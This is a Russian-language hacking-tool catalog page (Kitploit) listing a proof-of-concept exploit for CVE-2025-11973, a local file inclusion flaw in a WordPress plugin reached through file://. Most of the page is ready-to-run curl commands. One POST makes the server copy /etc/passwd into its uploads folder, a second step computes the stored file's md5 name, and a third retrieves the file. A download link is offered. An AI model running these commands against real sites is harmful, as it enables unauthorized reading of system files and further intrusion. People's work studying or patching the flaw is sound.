Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jfriedli/cve-2025-11973
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информации
GitHubjfriedli/cve-2025-11973

CVE-2025-11973

PoC-эксплойт для CVE-2025-11973, демонстрирующий локальное включение файлов (LFI) в WordPress через протокол file://, с автоматической эксфильтрацией /etc/passwd в каталог uploads.

Репозиторий
25 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Триггер: чтение /etc/passwd через file:// и эксфильтрация в uploads

root@kitploit:~
curl -sS -A "$UA" -X POST "$BASE/?__kds_flag=post" \
  --data-urlencode "kds_password=$SECRET" \
  --data-urlencode "post_title=sub1-lfi" \
  --data-urlencode "__kds_feature_url=file:///etc/passwd"

Извлечение эксфильтрированного файла

Вычисление имени сохранённого файла

root@kitploit:~
HASH=$(printf 'file:///etc/passwd' | md5sum | awk '{print $1}')

Получение файла

root@kitploit:~
curl -sS -A "$UA" "$BASE/wp-content/uploads/$YMD/${HASH}.jpg" | head -n 25
Скачать инструмент